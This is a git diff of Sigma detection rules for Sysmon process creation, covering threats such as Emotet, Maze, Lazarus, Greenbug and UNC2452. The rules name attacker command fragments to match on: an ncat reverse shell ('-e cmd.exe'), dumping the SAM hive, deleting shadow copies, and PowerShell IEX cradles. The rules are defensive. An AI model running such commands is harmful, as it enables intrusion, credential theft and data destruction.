-description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the - detection of suspicious sub process +description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process references: - https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/ - https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html diff --git a/sigma/sysmon/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml b/sigma/sysmon/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml index f35c6c9d9..26ae8b7df 100644 --- a/sigma/sysmon/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml +++ b/sigma/sysmon/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml @@ -1,8 +1,8 @@ title: Blue Mockingbird id: c3198a27-23a0-4c2c-af19-e5328d49680e related: - - id: ce239692-aa94-41b3-b32f-9cab259c96ea - type: merged + - id: ce239692-aa94-41b3-b32f-9cab259c96ea + type: merged status: test description: Attempts to detect system changes made by Blue Mockingbird references: @@ -25,12 +25,12 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational sc_cmd: Image|endswith: \cmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - sc config - wercplsupporte.dll wmic_cmd: Image|endswith: \wmic.exe - CommandLine|endswith: COR_PROFILER + CommandLine|endswith: COR_PROFILER condition: process_creation and (sc_cmd or wmic_cmd) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml b/sigma/sysmon/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml index 92607dee6..1ea74ba0d 100644 --- a/sigma/sysmon/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml +++ b/sigma/sysmon/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml @@ -1,8 +1,7 @@ title: Potential Emotet Rundll32 Execution id: 54e57ce3-0672-46eb-a402-2c0948d5e3e9 status: test -description: Detecting Emotet DLL loading by looking for rundll32.exe processes with - command lines ending in ,RunDLL or ,Control_RunDLL +description: Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL references: - https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html - https://cyber.wtf/2021/11/15/guess-whos-back/ @@ -22,19 +21,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|endswith: + CommandLine|endswith: - ',RunDLL' - ',Control_RunDLL' + # - ',#1' too generic - function load by ordinal is not Emotet specific filter_legitimate_dll: - CommandLine|endswith: + CommandLine|endswith: - .dll,Control_RunDLL - .dll",Control_RunDLL - .dll',Control_RunDLL filter_ide: - ParentImage|endswith: \tracker.exe + ParentImage|endswith: \tracker.exe # When Visual Studio compile NodeJS program, it might use MSBuild to create tracker.exe and then, the tracker.exe fork rundll32.exe condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml b/sigma/sysmon/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml index 4c67275c9..84fc20a40 100644 --- a/sigma/sysmon/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml +++ b/sigma/sysmon/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml @@ -1,8 +1,7 @@ title: Potential Ke3chang/TidePool Malware Activity id: 7b544661-69fc-419f-9a59-82ccc328f205 status: test -description: Detects registry modifications potentially related to the Ke3chang/TidePool - malware as seen in campaigns running in 2019 and 2020 +description: Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020 references: - https://web.archive.org/web/20200618080300/https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/ @@ -23,7 +22,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + # Ke3chang and TidePool both modify the IEHarden registry key, as well as the following list of keys. + # Setting these registry keys is unique to the Ke3chang and TidePool malware families. + # HKCU\Software\Microsoft\Internet Explorer\Main\Check_Associations + # HKCU\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize + # HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IEharden + CommandLine|contains: - -Property DWORD -name DisableFirstRunCustomize -value 2 -Force - -Property String -name Check_Associations -value - -Property DWORD -name IEHarden -value 0 -Force diff --git a/sigma/sysmon/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml b/sigma/sysmon/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml index e2c8daf1f..a9eb6a881 100644 --- a/sigma/sysmon/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml +++ b/sigma/sysmon/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml @@ -1,8 +1,7 @@ title: Potential Maze Ransomware Activity id: 29fd07fc-9cfd-4331-b7fd-cc18dfa21052 status: test -description: Detects specific process characteristics of Maze ransomware word document - droppers +description: Detects specific process characteristics of Maze ransomware word document droppers references: - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html - https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/ @@ -22,19 +21,22 @@ logsource: category: process_creation product: windows detection: + # Dropper process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: ParentImage|endswith: \WINWORD.exe Image|endswith: .tmp + # Binary Execution selection2: Image|endswith: \wmic.exe ParentImage|contains: \Temp\ - CommandLine|endswith: shadowcopy delete + CommandLine|endswith: shadowcopy delete + # Specific Pattern selection3: - CommandLine|endswith: shadowcopy delete - CommandLine|contains: \..\..\system32 + CommandLine|endswith: shadowcopy delete + CommandLine|contains: \..\..\system32 condition: process_creation and (1 of selection*) fields: - ComputerName diff --git a/sigma/sysmon/emerging-threats/2020/Malware/Trickbot/proc_creation_win_malware_trickbot_wermgr.yml b/sigma/sysmon/emerging-threats/2020/Malware/Trickbot/proc_creation_win_malware_trickbot_wermgr.yml index d6795498a..92067d5fd 100644 --- a/sigma/sysmon/emerging-threats/2020/Malware/Trickbot/proc_creation_win_malware_trickbot_wermgr.yml +++ b/sigma/sysmon/emerging-threats/2020/Malware/Trickbot/proc_creation_win_malware_trickbot_wermgr.yml @@ -1,11 +1,10 @@ title: Trickbot Malware Activity id: 58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27 related: - - id: c37510b8-2107-4b78-aa32-72f251e7a844 - type: similar + - id: c37510b8-2107-4b78-aa32-72f251e7a844 + type: similar status: stable -description: Detects Trickbot malware process tree pattern in which "rundll32.exe" - is a parent of "wermgr.exe" +description: Detects Trickbot malware process tree pattern in which "rundll32.exe" is a parent of "wermgr.exe" references: - https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20 - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/ diff --git a/sigma/sysmon/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml b/sigma/sysmon/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml index 986099578..27a84a251 100644 --- a/sigma/sysmon/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml +++ b/sigma/sysmon/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml @@ -1,8 +1,7 @@ title: EvilNum APT Golden Chickens Deployment Via OCX Files id: 8acf3cfa-1e8c-4099-83de-a0c4038e18f0 status: test -description: Detects Golden Chickens deployment method as used by Evilnum and described - in ESET July 2020 report +description: Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report references: - https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/ - https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/ @@ -22,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - regsvr32 - /s - /i diff --git a/sigma/sysmon/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml b/sigma/sysmon/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml index c680dcf09..2b8811716 100644 --- a/sigma/sysmon/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml +++ b/sigma/sysmon/emerging-threats/2020/TA/GALLIUM/proc_creation_win_apt_gallium_iocs.yml @@ -1,8 +1,7 @@ title: GALLIUM IOCs id: 440a56bf-7873-4439-940a-1c8a671073c2 status: test -description: Detects artifacts associated with GALLIUM cyber espionage group as reported - by Microsoft Threat Intelligence Center in the December 2019 report. +description: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report. references: - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ - https://github.com/Azure/Azure-Sentinel/blob/a02ce85c96f162de6f8cc06f07a53b6525f0ff7f/Solutions/Legacy%20IOC%20based%20Threat%20Protection/Analytic%20Rules/GalliumIOCs.yaml @@ -65,46 +64,46 @@ detection: - SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de - SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2 selection_hashes: - - sha256: - - 9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd - - 7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b - - 657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5 - - 2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29 - - 52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77 - - a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3 - - 5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022 - - 6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883 - - 3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e - - 1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7 - - fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1 - - 7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c - - 178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945 - - 51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9 - - 889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79 - - 332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf - - 44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08 - - 63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef - - 056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070 - - sha1: - - 53a44c2396d15c3a03723fa5e5db54cafd527635 - - 9c5e496921e3bc882dc40694f1dcc3746a75db19 - - aeb573accfd95758550cf30bf04f389a92922844 - - 79ef78a797403a4ed1a616c68e07fff868a8650a - - 4f6f38b4cec35e895d91c052b1f5a83d665c2196 - - 1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d - - e841a63e47361a572db9a7334af459ddca11347a - - c28f606df28a9bc8df75a4d5e5837fc5522dd34d - - 2e94b305d6812a9f96e6781c888e48c7fb157b6b - - dd44133716b8a241957b912fa6a02efde3ce3025 - - 8793bf166cb89eb55f0593404e4e933ab605e803 - - a39b57032dbb2335499a51e13470a7cd5d86b138 - - 41cc2b15c662bc001c0eb92f6cc222934f0beeea - - d209430d6af54792371174e70e27dd11d3def7a7 - - 1c6452026c56efd2c94cea7e0f671eb55515edb0 - - c6b41d3afdcdcaf9f442bbe772f5da871801fd5a - - 4923d460e22fbbf165bbbaba168e5a46b8157d9f - - f201504bd96e81d0d350c3a8332593ee1c9e09de - - ddd2db1127632a2a52943a2fe516a2e7d05d70d2 + - sha256: + - 9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd + - 7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b + - 657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5 + - 2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29 + - 52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77 + - a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3 + - 5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022 + - 6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883 + - 3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e + - 1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7 + - fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1 + - 7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c + - 178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945 + - 51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9 + - 889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79 + - 332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf + - 44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08 + - 63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef + - 056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070 + - sha1: + - 53a44c2396d15c3a03723fa5e5db54cafd527635 + - 9c5e496921e3bc882dc40694f1dcc3746a75db19 + - aeb573accfd95758550cf30bf04f389a92922844 + - 79ef78a797403a4ed1a616c68e07fff868a8650a + - 4f6f38b4cec35e895d91c052b1f5a83d665c2196 + - 1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d + - e841a63e47361a572db9a7334af459ddca11347a + - c28f606df28a9bc8df75a4d5e5837fc5522dd34d + - 2e94b305d6812a9f96e6781c888e48c7fb157b6b + - dd44133716b8a241957b912fa6a02efde3ce3025 + - 8793bf166cb89eb55f0593404e4e933ab605e803 + - a39b57032dbb2335499a51e13470a7cd5d86b138 + - 41cc2b15c662bc001c0eb92f6cc222934f0beeea + - d209430d6af54792371174e70e27dd11d3def7a7 + - 1c6452026c56efd2c94cea7e0f671eb55515edb0 + - c6b41d3afdcdcaf9f442bbe772f5da871801fd5a + - 4923d460e22fbbf165bbbaba168e5a46b8157d9f + - f201504bd96e81d0d350c3a8332593ee1c9e09de + - ddd2db1127632a2a52943a2fe516a2e7d05d70d2 condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml b/sigma/sysmon/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml index 1e80b7c8d..91a1fde4d 100644 --- a/sigma/sysmon/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml +++ b/sigma/sysmon/emerging-threats/2020/TA/Greenbug/proc_creation_win_apt_greenbug_may20.yml @@ -1,8 +1,7 @@ title: Greenbug Espionage Group Indicators id: 3711eee4-a808-4849-8a14-faf733da3612 status: test -description: Detects tools and process executions used by Greenbug in their May 2020 - campaign as reported by Symantec +description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia author: Florian Roth (Nextron Systems) @@ -33,16 +32,16 @@ detection: - \infopagesbackup\ncat.exe - :\ProgramData\comms\comms.exe selection_msf: - CommandLine|contains|all: + CommandLine|contains|all: - -ExecutionPolicy Bypass -File - \msf.ps1 selection_ncat: - CommandLine|contains|all: + CommandLine|contains|all: - infopagesbackup - \ncat - -e cmd.exe selection_powershell: - CommandLine|contains: + CommandLine|contains: - system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill - -nop -w hidden -c $k=new-object - '[Net.CredentialCache]::DefaultCredentials;IEX ' @@ -50,7 +49,7 @@ detection: - -noninteractive -executionpolicy bypass whoami - -noninteractive -executionpolicy bypass netstat -a selection_other: - CommandLine|contains: L3NlcnZlcj1 + CommandLine|contains: L3NlcnZlcj1 # base64 encoded '/server=' condition: process_creation and (1 of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml b/sigma/sysmon/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml index e832a4fe6..dbc1b6dd0 100644 --- a/sigma/sysmon/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml +++ b/sigma/sysmon/emerging-threats/2020/TA/Lazarus/proc_creation_win_apt_lazarus_group_activity.yml @@ -1,11 +1,10 @@ title: Lazarus Group Activity id: 24c4d154-05a4-4b99-b57d-9b977472443a related: - - id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e - type: obsoletes + - id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e + type: obsoletes status: test -description: Detects different process execution behaviors as described in various - threat reports on Lazarus group activity +description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity references: - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/ - https://www.hvs-consulting.de/lazarus-report/ @@ -26,32 +25,33 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_generic: - CommandLine|contains: + CommandLine|contains: - reg.exe save hklm\sam %temp%\~reg_sam.save - 1q2w3e4r@#$@#$@#$ - ' -hp1q2w3e4 ' - '.dat data03 10000 -p ' selection_netstat: - CommandLine|contains|all: + CommandLine|contains|all: - 'netstat -aon | find ' - ESTA - ' > %temp%\~' + # Network share discovery selection_network_discovery: - CommandLine|contains|all: + CommandLine|contains|all: - .255 10 C:\ProgramData\IBM\ - .DAT selection_persistence: - CommandLine|contains|all: + CommandLine|contains|all: - ' /c ' - ' -p 0x' - CommandLine|contains: + CommandLine|contains: - C:\ProgramData\ - C:\RECYCLER\ selection_rundll32: - CommandLine|contains|all: + CommandLine|contains|all: - 'rundll32 ' - C:\ProgramData\ - CommandLine|contains: + CommandLine|contains: - .bin, - .tmp, - .dat, diff --git a/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml b/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml index b1625e8dc..4eaaacef7 100644 --- a/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml +++ b/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_cmds.yml @@ -1,8 +1,7 @@ title: UNC2452 Process Creation Patterns id: 9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f status: test -description: Detects a specific process creation patterns as seen used by UNC2452 - and provided by Microsoft as Microsoft Defender ATP queries +description: Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries references: - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ author: Florian Roth (Nextron Systems) @@ -12,33 +11,36 @@ tags: - attack.execution - attack.t1059.001 - detection.emerging_threats + # - sunburst + # - unc2452 - sysmon logsource: category: process_creation product: windows detection: + # To avoid writing complex condition. "selection_generic_1" and "selection_generic_2" are the same except for the extension used. process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_generic_1: - CommandLine|contains: + CommandLine|contains: - 7z.exe a -v500m -mx9 -r0 -p - 7z.exe a -mx9 -r0 -p - CommandLine|contains|all: + CommandLine|contains|all: - .zip - .txt selection_generic_2: - CommandLine|contains: + CommandLine|contains: - 7z.exe a -v500m -mx9 -r0 -p - 7z.exe a -mx9 -r0 -p - CommandLine|contains|all: + CommandLine|contains|all: - .zip - .log selection_generic_3: ParentCommandLine|contains|all: - wscript.exe - .vbs - CommandLine|contains|all: + CommandLine|contains|all: - rundll32.exe - C:\Windows - .dll,Tk_ @@ -47,11 +49,11 @@ detection: ParentCommandLine|contains: - C:\Windows - .dll - CommandLine|contains: 'cmd.exe /C ' + CommandLine|contains: 'cmd.exe /C ' selection_generic_5: ParentImage|endswith: \rundll32.exe Image|endswith: \dllhost.exe - CommandLine: '' + CommandLine: '' condition: process_creation and (1 of selection_generic_*) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml b/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml index de3cc8524..c0a15fb2a 100644 --- a/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml +++ b/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_ps.yml @@ -1,8 +1,7 @@ title: UNC2452 PowerShell Pattern id: b7155193-8a81-4d8f-805d-88de864ca50c status: test -description: Detects a specific PowerShell command line pattern used by the UNC2452 - actors as mentioned in Microsoft and Symantec reports +description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware - https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/ @@ -15,6 +14,7 @@ tags: - attack.t1059.001 - attack.t1047 - detection.emerging_threats + # - sunburst - sysmon logsource: category: process_creation @@ -24,11 +24,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - Invoke-WMIMethod win32_process -name create -argumentlist - rundll32 c:\windows selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - 'wmic /node:' - process call create "rundll32 c:\windows condition: process_creation and (1 of selection_*) diff --git a/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml b/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml index eddbc63c0..a209e36ea 100644 --- a/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml +++ b/sigma/sysmon/emerging-threats/2020/TA/SolarWinds-Supply-Chain/proc_creation_win_apt_unc2452_vbscript_pattern.yml @@ -20,14 +20,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - Execute - CreateObject - RegRead - window.close - \Microsoft\Windows\CurrentVersion filter: - CommandLine|contains: \Software\Microsoft\Windows\CurrentVersion\Run + CommandLine|contains: \Software\Microsoft\Windows\CurrentVersion\Run condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml b/sigma/sysmon/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml index d81d166c0..f20750c90 100644 --- a/sigma/sysmon/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml +++ b/sigma/sysmon/emerging-threats/2020/TA/TAIDOOR-RAT/proc_creation_win_apt_taidoor.yml @@ -1,8 +1,7 @@ title: TAIDOOR RAT DLL Load id: d1aa3382-abab-446f-96ea-4de52908210b status: test -description: Detects specific process characteristics of Chinese TAIDOOR RAT malware - load +description: Detects specific process characteristics of Chinese TAIDOOR RAT malware load references: - https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a author: Florian Roth (Nextron Systems) @@ -21,13 +20,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: + CommandLine|contains: - dll,MyStart - dll MyStart selection2a: - CommandLine|endswith: ' MyStart' + CommandLine|endswith: ' MyStart' selection2b: - CommandLine|contains: rundll32.exe + CommandLine|contains: rundll32.exe condition: process_creation and (selection1 or ( selection2a and selection2b )) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml b/sigma/sysmon/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml index 6ba86ffa8..5767bca78 100644 --- a/sigma/sysmon/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml +++ b/sigma/sysmon/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_mal_hk_jan20.yml @@ -1,8 +1,7 @@ title: Winnti Malware HK University Campaign id: 3121461b-5aa0-4a41-b910-66d25524edbb status: test -description: Detects specific process characteristics of Winnti malware noticed in - Dec/Jan 2020 in a campaign against Honk Kong universities +description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities references: - https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/ author: Florian Roth (Nextron Systems), Markus Neis diff --git a/sigma/sysmon/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml b/sigma/sysmon/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml index 8db3cf985..13263821d 100644 --- a/sigma/sysmon/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml +++ b/sigma/sysmon/emerging-threats/2020/TA/Winnti/proc_creation_win_apt_winnti_pipemon.yml @@ -1,8 +1,7 @@ title: Winnti Pipemon Characteristics id: 73d70463-75c9-4258-92c6-17500fe972f2 status: stable -description: Detects specific process characteristics of Winnti Pipemon malware reported - by ESET +description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET references: - https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ author: Florian Roth (Nextron Systems), oscd.community @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains: setup0.exe -p + CommandLine|contains: setup0.exe -p selection_2: - CommandLine|contains: setup.exe - CommandLine|endswith: + CommandLine|contains: setup.exe + CommandLine|endswith: - -x:0 - -x:1 - -x:2 diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-1675/file_event_win_cve_2021_1675_printspooler.yml b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-1675/file_event_win_cve_2021_1675_printspooler.yml index 60cd1e71e..f369f8c5c 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-1675/file_event_win_cve_2021_1675_printspooler.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-1675/file_event_win_cve_2021_1675_printspooler.yml @@ -1,8 +1,7 @@ title: CVE-2021-1675 Print Spooler Exploitation Filename Pattern id: 2131cfb3-8c12-45e8-8fa0-31f5924e9f07 status: test -description: Detects the default filename used in PoC code against print spooler vulnerability - CVE-2021-1675 +description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675 references: - https://github.com/hhlxf/PrintNightmare - https://github.com/afwu/PrintNightmare diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml index ceac6bdd8..8d1a3514a 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml @@ -1,8 +1,7 @@ title: Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt id: 245f92e3-c4da-45f1-9070-bc552e06db11 status: test -description: Detects spawning of suspicious child processes by Atlassian Confluence - server which may indicate successful exploitation of CVE-2021-26084 +description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084 references: - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 - https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html @@ -26,8 +25,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: + # Monitor suspicious child processes spawned by Confluence ParentImage|endswith: 